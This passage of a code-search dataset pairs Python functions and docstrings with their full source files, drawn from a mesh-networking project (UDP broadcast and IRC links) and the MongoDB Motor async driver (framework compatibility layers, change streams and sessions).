if retry:
self.send(packet, retry=False)
|
pirate/mesh-networking | mesh/links.py | UDPLink.send | python | def send(self, packet, retry=True):
addr = ('255.255.255.255', self.port) # 255. is the broadcast IP for UDP
try:
self.send_socket.sendto(packet, addr)
except Exception as e:
self.log("Link failed to send packet over socket %s" % e)
sleep(0.2)
if retry:
self.send(packet, retry=False) | send a packet down the line to the inteface | train | https://github.com/pirate/mesh-networking/blob/e8da35d2ecded6930cf2180605bf28479ee555c7/mesh/links.py#L155-L164 | [
"def log(self, *args):\n \"\"\"stdout and stderr for the link\"\"\"\n print(\"%s %s\" % (str(self).ljust(8), \" \".join([str(x) for x in args])))\n",
"def send(self, packet, retry=True):\n \"\"\"send a packet down the line to the inteface\"\"\"\n addr = ('255.255.255.255', self.port) # 255. is the br... | class UDPLink(threading.Thread, VirtualLink):
"""This link sends all traffic as BROADCAST UDP packets on all physical ifaces.
Connect nodes on two different laptops to a UDPLink() with the same port and they will talk over wifi or ethernet.
"""
def __init__(self, name="en0", port=2016):
# UDPLinks have to be run in a seperate thread
# they rely on the infinite run() loop to read packets out of the socket, which would block the main thread
threading.Thread.__init__(self)
VirtualLink.__init__(self, name=name)
self.port = port
# self.log("starting...")
self._initsocket()
def __repr__(self):
return "<" + self.name + ">"
def _initsocket(self):
"""bind to the datagram socket (UDP), and enable BROADCAST mode"""
self.send_socket = socket(AF_INET, SOCK_DGRAM)
self.send_socket.setblocking(0)
self.send_socket.setsockopt(SOL_SOCKET, SO_BROADCAST, 1)
self.recv_socket = socket(AF_INET, SOCK_DGRAM)
self.recv_socket.setblocking(0)
if IS_BSD:
self.recv_socket.setsockopt(SOL_SOCKET, SO_REUSEPORT, 1) # requires sudo
self.recv_socket.setsockopt(SOL_SOCKET, SO_REUSEADDR, 1) # allows multiple UDPLinks to all listen for UDP packets
self.recv_socket.bind(('', self.port))
### Runloop
def run(self):
"""runloop that reads incoming packets off the interface into the inq buffer"""
# self.log("ready to receive.")
# we use a runloop instead of synchronous recv so stopping the node mid-recv is possible
read_ready = None
while self.keep_listening:
try:
read_ready, w, x = select.select([self.recv_socket], [], [], 0.01)
except Exception:
# catch timeouts
pass
if read_ready:
packet, addr = read_ready[0].recvfrom(4096)
if addr[1] == self.port:
# for each address listening to this link
for mac_addr, recv_queue in self.inq.items():
recv_queue.put(packet) # put packet in node's recv queue
else:
pass # not meant for us, it was sent to a different port
### IO
|
pirate/mesh-networking | mesh/links.py | IRCLink.run | python | def run(self):
self.log("ready to receive.")
# we use a runloop instead of synchronous recv so stopping the connection mid-recv is possible
self.net_socket.settimeout(0.05)
while self.keep_listening:
try:
packet = self.net_socket.recv(4096)
except:
packet = None
if packet:
packet, source = self._parse_msg(packet)
if packet == "PING":
self.net_socket.send(b'PONG ' + source + b'\r')
elif packet:
for mac_addr, recv_queue in self.inq.items():
# put the packet in that mac_addr recv queue
recv_queue.put(packet)
self.log('is down.') | runloop that reads incoming packets off the interface into the inq buffer | train | https://github.com/pirate/mesh-networking/blob/e8da35d2ecded6930cf2180605bf28479ee555c7/mesh/links.py#L237-L255 | [
"def log(self, *args):\n \"\"\"stdout and stderr for the link\"\"\"\n print(\"%s %s\" % (str(self).ljust(8), \" \".join([str(x) for x in args])))\n",
"def _parse_msg(self, msg):\n if b\"PRIVMSG\" in msg:\n from_nick = msg.split(b\"PRIVMSG \",1)[0].split(b\"!\")[0][1:] # who sent the P... | class IRCLink(threading.Thread, VirtualLink):
"""This link connects to an IRC channel and uses it to simulate a BROADCAST connection over the internet.
Connect nodes on different computers to an IRCLink on the same channel and they will talk over the internet."""
def __init__(self, name='irc1', server='irc.freenode.net', port=6667, channel='##medusa', nick='bobbyTables'):
threading.Thread.__init__(self)
VirtualLink.__init__(self, name=name)
self.name = name
self.server = server
self.port = port
self.channel = channel
self.nick = nick if nick != 'bobbyTables' else 'bobbyTables' + str(randint(1, 1000))
self.log("starting...")
self._connect()
self._join_channel()
self.log("irc channel connected.")
def __repr__(self):
return "<"+self.name+">"
def stop(self):
self.net_socket.send(b"QUIT\r\n")
VirtualLink.stop(self)
def _parse_msg(self, msg):
if b"PRIVMSG" in msg:
from_nick = msg.split(b"PRIVMSG ",1)[0].split(b"!")[0][1:] # who sent the PRIVMSG
to_nick = msg.split(b"PRIVMSG ",1)[1].split(b" :",1)[0] # where did they send it
text = msg.split(b"PRIVMSG ",1)[1].split(b" :",1)[1].strip() # what did it contain
return (text, from_nick)
elif msg.find(b"PING :",0,6) != -1: # was it just a ping?
from_srv = msg.split(b"PING :")[1].strip() # the source of the PING
return ("PING", from_srv)
return ("","")
def _connect(self):
self.log("connecting to server %s:%s..." % (self.server, self.port))
self.net_socket = socket(AF_INET, SOCK_STREAM)
self.net_socket.connect((self.server, self.port))
self.net_socket.setblocking(1)
self.net_socket.settimeout(2)
msg = self.net_socket.recv(4096)
while msg:
try:
# keep reading 2 sec until servers stops sending text
msg = self.net_socket.recv(4096).strip()
except Exception:
msg = None
def _join_channel(self):
self.log("joining channel %s as %s..." % (self.channel, self.nick))
nick = self.nick
self.net_socket.settimeout(10)
self.net_socket.send(('NICK %s\r\n' % nick).encode('utf-8'))
self.net_socket.send(('USER %s %s %s :%s\r\n' % (nick, nick, nick, nick)).encode('utf-8'))
self.net_socket.send(('JOIN %s\r\n' % self.channel).encode('utf-8'))
msg = self.net_socket.recv(4096)
while msg:
if b"Nickname is already in use" in msg:
self.nick += str(randint(1, 1000))
self._join_channel()
return
elif b"JOIN" in msg:
# keep looping till we see JOIN, then we're succesfully in the room
break
try:
msg = self.net_socket.recv(4096).strip()
except:
msg = None
### Runloop
### IO
def send(self, packet, retry=True):
"""send a packet down the line to the inteface"""
if not self.keep_listening:
self.log('is down.')
return
try:
# (because the IRC server sees this link as 1 connection no matter how many nodes use it, it wont send enough copies of the packet back)
# for each node listening to this link object locally
for mac_addr, recv_queue in self.inq.items():
recv_queue.put(packet) # put the packet directly in their in queue
# then send it down the wire to the IRC channel
self.net_socket.send(('PRIVMSG %s :%s\r\n' % (self.channel, packet.decode())).encode('utf-8'))
except Exception as e:
self.log("Link failed to send packet over socket %s" % e)
sleep(0.2)
if retry:
self.send(packet, retry=False)
|
pirate/mesh-networking | mesh/links.py | IRCLink.send | python | def send(self, packet, retry=True):
if not self.keep_listening:
self.log('is down.')
return
try:
# (because the IRC server sees this link as 1 connection no matter how many nodes use it, it wont send enough copies of the packet back)
# for each node listening to this link object locally
for mac_addr, recv_queue in self.inq.items():
recv_queue.put(packet) # put the packet directly in their in queue
# then send it down the wire to the IRC channel
self.net_socket.send(('PRIVMSG %s :%s\r\n' % (self.channel, packet.decode())).encode('utf-8'))
except Exception as e:
self.log("Link failed to send packet over socket %s" % e)
sleep(0.2)
if retry:
self.send(packet, retry=False) | send a packet down the line to the inteface | train | https://github.com/pirate/mesh-networking/blob/e8da35d2ecded6930cf2180605bf28479ee555c7/mesh/links.py#L259-L276 | [
"def log(self, *args):\n \"\"\"stdout and stderr for the link\"\"\"\n print(\"%s %s\" % (str(self).ljust(8), \" \".join([str(x) for x in args])))\n",
"def send(self, packet, retry=True):\n \"\"\"send a packet down the line to the inteface\"\"\"\n if not self.keep_listening:\n self.log('is down.... | class IRCLink(threading.Thread, VirtualLink):
"""This link connects to an IRC channel and uses it to simulate a BROADCAST connection over the internet.
Connect nodes on different computers to an IRCLink on the same channel and they will talk over the internet."""
def __init__(self, name='irc1', server='irc.freenode.net', port=6667, channel='##medusa', nick='bobbyTables'):
threading.Thread.__init__(self)
VirtualLink.__init__(self, name=name)
self.name = name
self.server = server
self.port = port
self.channel = channel
self.nick = nick if nick != 'bobbyTables' else 'bobbyTables' + str(randint(1, 1000))
self.log("starting...")
self._connect()
self._join_channel()
self.log("irc channel connected.")
def __repr__(self):
return "<"+self.name+">"
def stop(self):
self.net_socket.send(b"QUIT\r\n")
VirtualLink.stop(self)
def _parse_msg(self, msg):
if b"PRIVMSG" in msg:
from_nick = msg.split(b"PRIVMSG ",1)[0].split(b"!")[0][1:] # who sent the PRIVMSG
to_nick = msg.split(b"PRIVMSG ",1)[1].split(b" :",1)[0] # where did they send it
text = msg.split(b"PRIVMSG ",1)[1].split(b" :",1)[1].strip() # what did it contain
return (text, from_nick)
elif msg.find(b"PING :",0,6) != -1: # was it just a ping?
from_srv = msg.split(b"PING :")[1].strip() # the source of the PING
return ("PING", from_srv)
return ("","")
def _connect(self):
self.log("connecting to server %s:%s..." % (self.server, self.port))
self.net_socket = socket(AF_INET, SOCK_STREAM)
self.net_socket.connect((self.server, self.port))
self.net_socket.setblocking(1)
self.net_socket.settimeout(2)
msg = self.net_socket.recv(4096)
while msg:
try:
# keep reading 2 sec until servers stops sending text
msg = self.net_socket.recv(4096).strip()
except Exception:
msg = None
def _join_channel(self):
self.log("joining channel %s as %s..." % (self.channel, self.nick))
nick = self.nick
self.net_socket.settimeout(10)
self.net_socket.send(('NICK %s\r\n' % nick).encode('utf-8'))
self.net_socket.send(('USER %s %s %s :%s\r\n' % (nick, nick, nick, nick)).encode('utf-8'))
self.net_socket.send(('JOIN %s\r\n' % self.channel).encode('utf-8'))
msg = self.net_socket.recv(4096)
while msg:
if b"Nickname is already in use" in msg:
self.nick += str(randint(1, 1000))
self._join_channel()
return
elif b"JOIN" in msg:
# keep looping till we see JOIN, then we're succesfully in the room
break
try:
msg = self.net_socket.recv(4096).strip()
except:
msg = None
### Runloop
def run(self):
"""runloop that reads incoming packets off the interface into the inq buffer"""
self.log("ready to receive.")
# we use a runloop instead of synchronous recv so stopping the connection mid-recv is possible
self.net_socket.settimeout(0.05)
while self.keep_listening:
try:
packet = self.net_socket.recv(4096)
except:
packet = None
if packet:
packet, source = self._parse_msg(packet)
if packet == "PING":
self.net_socket.send(b'PONG ' + source + b'\r')
elif packet:
for mac_addr, recv_queue in self.inq.items():
# put the packet in that mac_addr recv queue
recv_queue.put(packet)
self.log('is down.')
### IO
|
pirate/mesh-networking | examples/large_network.py | hops | python | def hops(node1, node2):
if node1 == node2:
return 0
elif set(node1.interfaces) & set(node2.interfaces):
# they share a common interface
return 1
else:
# Not implemented yet, graphsearch to find min hops between two nodes
return 0 | returns # of hops it takes to get from node1 to node2, 1 means they're on the same link | train | https://github.com/pirate/mesh-networking/blob/e8da35d2ecded6930cf2180605bf28479ee555c7/examples/large_network.py#L14-L23 | null | # -*- coding: utf-8 -*-
# MIT Liscence : Nick Sweeting
import traceback
import time
import random
from mesh.node import Node
from mesh.links import UDPLink, VirtualLink, IRCLink
from mesh.programs import Printer, Switch
from mesh.filters import UniqueFilter
def linkmembers(nodes, link):
return [n for n in nodes if link in n.interfaces]
def eigenvalue(nodes, node=None):
"""
calculate the eigenvalue (number of connections) for a given node in an array of nodes connected by an array of links
if no node is given, return the minimum eigenvalue in the whole network
"""
if node is None:
return sorted([eigenvalue(nodes, n) for n in nodes])[0] # return lowest eigenvalue
else:
return len([1 for n in nodes if hops(node, n)])
def even_eigen_randomize(nodes, links, min_eigen=1):
print("Linking %s together randomly." % len(nodes))
for node in nodes:
while len(node.interfaces) < ((desired_min_eigenvalue - random.randint(0, 3)) or 1):
node.interfaces.append(random.choice(tuple(set(links) - set(node.interfaces))))
def ask(type, question, fallback=None):
value = input(question)
if type == bool:
if fallback:
return not value[:1].lower() == "n"
else:
return value[:1].lower() == "y"
try:
return type(value)
except Exception:
return fallback
HELP_STR = """Type a nodelabel or linkname to send messages.
e.g. [$]:n35
[n35]<en1> ∂5:hi
or
[$]:l5
<l5>(3) [n1,n4,n3]:whats up"""
if __name__ == "__main__":
# import sys
# import netifaces
# hardware_iface = netifaces.gateways()['default'][2][1]
port = 2016
# if len(sys.argv) > 1:
# hardware_iface = sys.argv[1]
num_nodes = ask(int, "How many nodes do you want? [30]:", 30)
num_links = ask(int, "How many links do you want? [8]:", 8)
irc_link = ask(bool, "Link to internet? y/[n]:", False)
real_link = ask(bool, "Link to local networks? [y]/n:", True)
randomize = ask(bool, "Randomize connections? [y]/n:", True)
print('Creating Links...')
links = []
if real_link:
links += [UDPLink('en0', port), UDPLink('en1', port+1), UDPLink('en2', port+2)]
if irc_link:
links += [IRCLink('irc0')]
links += [
VirtualLink("vl%s" % (x+1))
for x in range(num_links)
]
print('Creating Nodes...')
nodes = [
Node(None, "n%s" % x, Filters=[UniqueFilter], Program=random.choice((Printer, Switch)))
for x in range(num_nodes)
]
if randomize:
desired_min_eigenvalue = 4 if num_links > 4 else (len(links) - 2) # must be less than the total number of nodes!!!
even_eigen_randomize(nodes, links, desired_min_eigenvalue)
print("Let there be life.")
[link.start() for link in links]
for node in nodes:
node.start()
print("%s:%s" % (node, node.interfaces))
print(HELP_STR)
dont_exit = True
try:
while dont_exit:
command = str(input("[$]:"))
if command[:1] == "l":
# LINK COMMANDS
link = [l for l in links if l.name[1:] == command[1:]]
if link:
link = link[0]
link_members = linkmembers(nodes, link)
message = str(input("%s(%s) %s:" % (link, len(link_members), link_members)))
if message == "stop":
link.stop()
else:
link.send(bytes(message, 'UTF-8')) # convert python str to bytes for sending over the wire
else:
print("Not a link.")
elif command[:1] == "n":
# NODE COMMANDS
node = [n for n in nodes if n.name[1:] == command[1:]]
if node:
node = node[0]
message = str(input("%s<%s> ∂%s:" % (node, node.interfaces, eigenvalue(nodes, node))))
if message == "stop":
node.stop()
else:
node.send(bytes(message, 'UTF-8')) # convert python str to bytes for sending over the wire
else:
print("Not a node.")
elif command[:1] == "h":
print(HELP_STR)
else:
print("Invalid command.")
print(HELP_STR)
time.sleep(0.5)
except BaseException as e:
intentional = type(e) in (KeyboardInterrupt, EOFError)
if not intentional:
traceback.print_exc()
try:
assert all([n.stop() for n in nodes]), 'Some nodes failed to stop.'
assert all([l.stop() for l in links]), 'Some links failed to stop.'
except Exception as e:
traceback.print_exc()
intentional = False
print("EXITING CLEANLY" if intentional else "EXITING BADLY")
raise SystemExit(int(not intentional))
|
pirate/mesh-networking | examples/large_network.py | eigenvalue | python | def eigenvalue(nodes, node=None):
if node is None:
return sorted([eigenvalue(nodes, n) for n in nodes])[0] # return lowest eigenvalue
else:
return len([1 for n in nodes if hops(node, n)]) | calculate the eigenvalue (number of connections) for a given node in an array of nodes connected by an array of links
if no node is given, return the minimum eigenvalue in the whole network | train | https://github.com/pirate/mesh-networking/blob/e8da35d2ecded6930cf2180605bf28479ee555c7/examples/large_network.py#L28-L36 | null | # -*- coding: utf-8 -*-
# MIT Liscence : Nick Sweeting
import traceback
import time
import random
from mesh.node import Node
from mesh.links import UDPLink, VirtualLink, IRCLink
from mesh.programs import Printer, Switch
from mesh.filters import UniqueFilter
def hops(node1, node2):
"""returns # of hops it takes to get from node1 to node2, 1 means they're on the same link"""
if node1 == node2:
return 0
elif set(node1.interfaces) & set(node2.interfaces):
# they share a common interface
return 1
else:
# Not implemented yet, graphsearch to find min hops between two nodes
return 0
def linkmembers(nodes, link):
return [n for n in nodes if link in n.interfaces]
def even_eigen_randomize(nodes, links, min_eigen=1):
print("Linking %s together randomly." % len(nodes))
for node in nodes:
while len(node.interfaces) < ((desired_min_eigenvalue - random.randint(0, 3)) or 1):
node.interfaces.append(random.choice(tuple(set(links) - set(node.interfaces))))
def ask(type, question, fallback=None):
value = input(question)
if type == bool:
if fallback:
return not value[:1].lower() == "n"
else:
return value[:1].lower() == "y"
try:
return type(value)
except Exception:
return fallback
HELP_STR = """Type a nodelabel or linkname to send messages.
e.g. [$]:n35
[n35]<en1> ∂5:hi
or
[$]:l5
<l5>(3) [n1,n4,n3]:whats up"""
if __name__ == "__main__":
# import sys
# import netifaces
# hardware_iface = netifaces.gateways()['default'][2][1]
port = 2016
# if len(sys.argv) > 1:
# hardware_iface = sys.argv[1]
num_nodes = ask(int, "How many nodes do you want? [30]:", 30)
num_links = ask(int, "How many links do you want? [8]:", 8)
irc_link = ask(bool, "Link to internet? y/[n]:", False)
real_link = ask(bool, "Link to local networks? [y]/n:", True)
randomize = ask(bool, "Randomize connections? [y]/n:", True)
print('Creating Links...')
links = []
if real_link:
links += [UDPLink('en0', port), UDPLink('en1', port+1), UDPLink('en2', port+2)]
if irc_link:
links += [IRCLink('irc0')]
links += [
VirtualLink("vl%s" % (x+1))
for x in range(num_links)
]
print('Creating Nodes...')
nodes = [
Node(None, "n%s" % x, Filters=[UniqueFilter], Program=random.choice((Printer, Switch)))
for x in range(num_nodes)
]
if randomize:
desired_min_eigenvalue = 4 if num_links > 4 else (len(links) - 2) # must be less than the total number of nodes!!!
even_eigen_randomize(nodes, links, desired_min_eigenvalue)
print("Let there be life.")
[link.start() for link in links]
for node in nodes:
node.start()
print("%s:%s" % (node, node.interfaces))
print(HELP_STR)
dont_exit = True
try:
while dont_exit:
command = str(input("[$]:"))
if command[:1] == "l":
# LINK COMMANDS
link = [l for l in links if l.name[1:] == command[1:]]
if link:
link = link[0]
link_members = linkmembers(nodes, link)
message = str(input("%s(%s) %s:" % (link, len(link_members), link_members)))
if message == "stop":
link.stop()
else:
link.send(bytes(message, 'UTF-8')) # convert python str to bytes for sending over the wire
else:
print("Not a link.")
elif command[:1] == "n":
# NODE COMMANDS
node = [n for n in nodes if n.name[1:] == command[1:]]
if node:
node = node[0]
message = str(input("%s<%s> ∂%s:" % (node, node.interfaces, eigenvalue(nodes, node))))
if message == "stop":
node.stop()
else:
node.send(bytes(message, 'UTF-8')) # convert python str to bytes for sending over the wire
else:
print("Not a node.")
elif command[:1] == "h":
print(HELP_STR)
else:
print("Invalid command.")
print(HELP_STR)
time.sleep(0.5)
except BaseException as e:
intentional = type(e) in (KeyboardInterrupt, EOFError)
if not intentional:
traceback.print_exc()
try:
assert all([n.stop() for n in nodes]), 'Some nodes failed to stop.'
assert all([l.stop() for l in links]), 'Some links failed to stop.'
except Exception as e:
traceback.print_exc()
intentional = False
print("EXITING CLEANLY" if intentional else "EXITING BADLY")
raise SystemExit(int(not intentional))
|
mongodb/motor | motor/frameworks/asyncio/__init__.py | chain_return_value | python | def chain_return_value(future, loop, return_value):
chained = asyncio.Future(loop=loop)
def copy(_future):
if _future.exception() is not None:
chained.set_exception(_future.exception())
else:
chained.set_result(return_value)
future._future.add_done_callback(functools.partial(loop.add_callback, copy))
return chained | Compatible way to return a value in all Pythons.
PEP 479, raise StopIteration(value) from a coroutine won't work forever,
but "return value" doesn't work in Python 2. Instead, Motor methods that
return values resolve a Future with it, and are implemented with callbacks
rather than a coroutine internally. | train | https://github.com/mongodb/motor/blob/6af22720723bde7c78eb8cb126962cfbfc034b2c/motor/frameworks/asyncio/__init__.py#L111-L128 | null | # Copyright 2014-2016 MongoDB, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""asyncio compatibility layer for Motor, an asynchronous MongoDB driver.
See "Frameworks" in the Developer Guide.
"""
import asyncio
import asyncio.tasks
import functools
import multiprocessing
import os
from asyncio import coroutine # For framework interface.
from concurrent.futures import ThreadPoolExecutor
CLASS_PREFIX = 'AsyncIO'
def get_event_loop():
return asyncio.get_event_loop()
def is_event_loop(loop):
return isinstance(loop, asyncio.AbstractEventLoop)
def check_event_loop(loop):
if not is_event_loop(loop):
raise TypeError(
"io_loop must be instance of asyncio-compatible event loop,"
"not %r" % loop)
def get_future(loop):
return asyncio.Future(loop=loop)
if 'MOTOR_MAX_WORKERS' in os.environ:
max_workers = int(os.environ['MOTOR_MAX_WORKERS'])
else:
max_workers = multiprocessing.cpu_count() * 5
_EXECUTOR = ThreadPoolExecutor(max_workers=max_workers)
def run_on_executor(loop, fn, *args, **kwargs):
# Adapted from asyncio's wrap_future and _chain_future. Ensure the wrapped
# future is resolved on the main thread when the executor's future is
# resolved on a worker thread. asyncio's wrap_future does the same, but
# throws an error if the loop is stopped. We want to avoid errors if a
# background task completes after the loop stops, e.g. ChangeStream.next()
# returns while the program is shutting down.
def _set_state():
if dest.cancelled():
return
if source.cancelled():
dest.cancel()
else:
exception = source.exception()
if exception is not None:
dest.set_exception(exception)
else:
result = source.result()
dest.set_result(result)
def _call_check_cancel(_):
if dest.cancelled():
source.cancel()
def _call_set_state(_):
if loop.is_closed():
return
loop.call_soon_threadsafe(_set_state)
source = _EXECUTOR.submit(functools.partial(fn, *args, **kwargs))
dest = asyncio.Future(loop=loop)
dest.add_done_callback(_call_check_cancel)
source.add_done_callback(_call_set_state)
return dest
# Adapted from tornado.gen.
def chain_future(a, b):
def copy(future):
assert future is a
if b.done():
return
if a.exception() is not None:
b.set_exception(a.exception())
else:
b.set_result(a.result())
a.add_done_callback(copy)
def is_future(f):
return isinstance(f, asyncio.Future)
def call_soon(loop, callback, *args, **kwargs):
if kwargs:
loop.call_soon(functools.partial(callback, *args, **kwargs))
else:
loop.call_soon(callback, *args)
def add_future(loop, future, callback, *args):
future.add_done_callback(
functools.partial(loop.call_soon_threadsafe, callback, *args))
def pymongo_class_wrapper(f, pymongo_class):
"""Executes the coroutine f and wraps its result in a Motor class.
See WrapAsync.
"""
@functools.wraps(f)
@asyncio.coroutine
def _wrapper(self, *args, **kwargs):
result = yield from f(self, *args, **kwargs)
# Don't call isinstance(), not checking subclasses.
if result.__class__ == pymongo_class:
# Delegate to the current object to wrap the result.
return self.wrap(result)
else:
return result
return _wrapper
def yieldable(future):
return next(iter(future))
def platform_info():
return None
|
mongodb/motor | motor/frameworks/tornado/__init__.py | pymongo_class_wrapper | python | def pymongo_class_wrapper(f, pymongo_class):
@functools.wraps(f)
@coroutine
def _wrapper(self, *args, **kwargs):
result = yield f(self, *args, **kwargs)
# Don't call isinstance(), not checking subclasses.
if result.__class__ == pymongo_class:
# Delegate to the current object to wrap the result.
raise gen.Return(self.wrap(result))
else:
raise gen.Return(result)
return _wrapper | Executes the coroutine f and wraps its result in a Motor class.
See WrapAsync. | train | https://github.com/mongodb/motor/blob/6af22720723bde7c78eb8cb126962cfbfc034b2c/motor/frameworks/tornado/__init__.py#L113-L130 | null | # Copyright 2014-2016 MongoDB, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import absolute_import, unicode_literals
"""Tornado compatibility layer for Motor, an asynchronous MongoDB driver.
See "Frameworks" in the Developer Guide.
"""
import functools
import os
from concurrent.futures import ThreadPoolExecutor
import tornado.process
from tornado import concurrent, gen, ioloop, version as tornado_version
from tornado.gen import chain_future, coroutine # For framework interface.
CLASS_PREFIX = ''
def get_event_loop():
return ioloop.IOLoop.current()
def is_event_loop(loop):
return isinstance(loop, ioloop.IOLoop)
def check_event_loop(loop):
if not is_event_loop(loop):
raise TypeError(
"io_loop must be instance of IOLoop, not %r" % loop)
def get_future(loop):
return concurrent.Future()
if 'MOTOR_MAX_WORKERS' in os.environ:
max_workers = int(os.environ['MOTOR_MAX_WORKERS'])
else:
max_workers = tornado.process.cpu_count() * 5
_EXECUTOR = ThreadPoolExecutor(max_workers=max_workers)
def run_on_executor(loop, fn, *args, **kwargs):
# Need a Tornado Future for "await" expressions. exec_fut is resolved on a
# worker thread, loop.add_future ensures "future" is resolved on main.
future = concurrent.Future()
exec_fut = _EXECUTOR.submit(fn, *args, **kwargs)
def copy(_):
if future.done():
return
if exec_fut.exception() is not None:
future.set_exception(exec_fut.exception())
else:
future.set_result(exec_fut.result())
# Ensure copy runs on main thread.
loop.add_future(exec_fut, copy)
return future
def chain_return_value(future, loop, return_value):
"""Compatible way to return a value in all Pythons.
PEP 479, raise StopIteration(value) from a coroutine won't work forever,
but "return value" doesn't work in Python 2. Instead, Motor methods that
return values resolve a Future with it, and are implemented with callbacks
rather than a coroutine internally.
"""
chained = concurrent.Future()
def copy(_future):
if _future.exception() is not None:
chained.set_exception(_future.exception())
else:
chained.set_result(return_value)
future.add_done_callback(functools.partial(loop.add_callback, copy))
return chained
def is_future(f):
return isinstance(f, concurrent.Future)
def call_soon(loop, callback, *args, **kwargs):
if args or kwargs:
loop.add_callback(functools.partial(callback, *args, **kwargs))
else:
loop.add_callback(callback)
def add_future(loop, future, callback, *args):
loop.add_future(future, functools.partial(callback, *args))
def yieldable(future):
return future
def platform_info():
return 'Tornado %s' % (tornado_version,)
|
mongodb/motor | motor/core.py | AgnosticClient.watch | python | def watch(self, pipeline=None, full_document='default', resume_after=None,
max_await_time_ms=None, batch_size=None, collation=None,
start_at_operation_time=None, session=None):
cursor_class = create_class_with_framework(
AgnosticChangeStream, self._framework, self.__module__)
# Latent cursor that will send initial command on first "async for".
return cursor_class(self, pipeline, full_document, resume_after,
max_await_time_ms, batch_size, collation,
start_at_operation_time, session) | Watch changes on this cluster.
Returns a :class:`~MotorChangeStream` cursor which iterates over changes
on all databases in this cluster. Introduced in MongoDB 4.0.
See the documentation for :meth:`MotorCollection.watch` for more
details and examples.
:Parameters:
- `pipeline` (optional): A list of aggregation pipeline stages to
append to an initial ``$changeStream`` stage. Not all
pipeline stages are valid after a ``$changeStream`` stage, see the
MongoDB documentation on change streams for the supported stages.
- `full_document` (optional): The fullDocument option to pass
to the ``$changeStream`` stage. Allowed values: 'default',
'updateLookup'. Defaults to 'default'.
When set to 'updateLookup', the change notification for partial
updates will include both a delta describing the changes to the
document, as well as a copy of the entire document that was
changed from some time after the change occurred.
- `resume_after` (optional): The logical starting point for this
change stream.
- `max_await_time_ms` (optional): The maximum time in milliseconds
for the server to wait for changes before responding to a getMore
operation.
- `batch_size` (optional): The maximum number of documents to return
per batch.
- `collation` (optional): The :class:`~pymongo.collation.Collation`
to use for the aggregation.
- `start_at_operation_time` (optional): If provided, the resulting
change stream will only return changes that occurred at or after
the specified :class:`~bson.timestamp.Timestamp`. Requires
MongoDB >= 4.0.
- `session` (optional): a
:class:`~pymongo.client_session.ClientSession`.
:Returns:
A :class:`~MotorChangeStream`.
.. versionadded:: 2.0
.. mongodoc:: changeStreams | train | https://github.com/mongodb/motor/blob/6af22720723bde7c78eb8cb126962cfbfc034b2c/motor/core.py#L148-L200 | [
"def create_class_with_framework(cls, framework, module_name):\n motor_class_name = framework.CLASS_PREFIX + cls.__motor_class_name__\n cache_key = (cls, motor_class_name, framework)\n cached_class = _class_cache.get(cache_key)\n if cached_class:\n return cached_class\n\n new_class = type(str(... | class AgnosticClient(AgnosticBaseProperties):
__motor_class_name__ = 'MotorClient'
__delegate_class__ = pymongo.mongo_client.MongoClient
address = ReadOnlyProperty()
arbiters = ReadOnlyProperty()
close = DelegateMethod()
drop_database = AsyncCommand().unwrap('MotorDatabase')
event_listeners = ReadOnlyProperty()
fsync = AsyncCommand()
get_database = DelegateMethod(doc=get_database_doc).wrap(Database)
HOST = ReadOnlyProperty()
is_mongos = ReadOnlyProperty()
is_primary = ReadOnlyProperty()
list_databases = AsyncRead().wrap(CommandCursor)
list_database_names = AsyncRead()
local_threshold_ms = ReadOnlyProperty()
max_bson_size = ReadOnlyProperty()
max_idle_time_ms = ReadOnlyProperty()
max_message_size = ReadOnlyProperty()
max_pool_size = ReadOnlyProperty()
max_write_batch_size = ReadOnlyProperty()
min_pool_size = ReadOnlyProperty()
nodes = ReadOnlyProperty()
PORT = ReadOnlyProperty()
primary = ReadOnlyProperty()
read_concern = ReadOnlyProperty()
retry_writes = ReadOnlyProperty()
secondaries = ReadOnlyProperty()
server_info = AsyncRead()
server_selection_timeout = ReadOnlyProperty()
start_session = AsyncCommand(doc=start_session_doc).wrap(ClientSession)
unlock = AsyncCommand()
def __init__(self, *args, **kwargs):
"""Create a new connection to a single MongoDB instance at *host:port*.
Takes the same constructor arguments as
:class:`~pymongo.mongo_client.MongoClient`, as well as:
:Parameters:
- `io_loop` (optional): Special event loop
instance to use instead of default
"""
if 'io_loop' in kwargs:
io_loop = kwargs.pop('io_loop')
self._framework.check_event_loop(io_loop)
else:
io_loop = self._framework.get_event_loop()
kwargs.setdefault('connect', False)
kwargs.setdefault(
'driver',
DriverInfo('Motor', motor_version, self._framework.platform_info()))
delegate = self.__delegate_class__(*args, **kwargs)
super(AgnosticBaseProperties, self).__init__(delegate)
self.io_loop = io_loop
def get_io_loop(self):
return self.io_loop
def __getattr__(self, name):
if name.startswith('_'):
raise AttributeError(
"%s has no attribute %r. To access the %s"
" database, use client['%s']." % (
self.__class__.__name__, name, name, name))
return self[name]
def __getitem__(self, name):
db_class = create_class_with_framework(
AgnosticDatabase, self._framework, self.__module__)
return db_class(self, name)
def wrap(self, obj):
if obj.__class__ == Database:
db_class = create_class_with_framework(
AgnosticDatabase,
self._framework,
self.__module__)
return db_class(self, obj.name, _delegate=obj)
elif obj.__class__ == CommandCursor:
command_cursor_class = create_class_with_framework(
AgnosticCommandCursor,
self._framework,
self.__module__)
return command_cursor_class(obj, self)
elif obj.__class__ == ClientSession:
session_class = create_class_with_framework(
AgnosticClientSession,
self._framework,
self.__module__)
return session_class(obj, self)
|
mongodb/motor | motor/core.py | AgnosticClientSession.start_transaction | python | def start_transaction(self, read_concern=None, write_concern=None,
read_preference=None):
self.delegate.start_transaction(read_concern=read_concern,
write_concern=write_concern,
read_preference=read_preference)
return _MotorTransactionContext(self) | Start a multi-statement transaction.
Takes the same arguments as
:class:`~pymongo.client_session.TransactionOptions`.
Best used in a context manager block:
.. code-block:: python3
# Use "await" for start_session, but not for start_transaction.
async with await client.start_session() as s:
async with s.start_transaction():
